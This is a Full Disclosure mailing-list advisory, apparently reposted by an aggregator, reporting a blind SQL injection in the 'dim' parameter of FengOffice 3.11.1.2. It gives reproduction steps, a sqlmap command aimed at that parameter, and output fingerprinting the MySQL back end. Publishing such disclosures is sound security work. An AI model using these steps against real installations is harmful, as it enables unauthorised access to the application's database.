Blind SQL Injection - fengofficev3.11.1.2
2024-6-9 15:39:44 Author: seclists.org(查看原文) 阅读量:8 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Andrey Stoykov <mwebsec () gmail com>
Date: Wed, 5 Jun 2024 19:58:19 +0000

# Exploit Title: FengOffice - Blind SQL Injection
# Date: 06/2024
# Exploit Author: Andrey Stoykov
# Version: 3.11.1.2
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/05/friday-fun-pentest-series-6.html

Steps to Reproduce:


   1. Login to application
   2. Click on "Workspaces"
   3. Copy full URL
   4. Paste the HTTP GET request into text file
   5. Set the injection point to be in the "dim" parameter value
   6. Use SQLMap to automate the process


sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim
--fingerprint

[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.37
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • Blind SQL Injection - fengofficev3.11.1.2 Andrey Stoykov (Jun 09)

文章来源: https://seclists.org/fulldisclosure/2024/Jun/2
如有侵权请联系:admin#unsafe.sh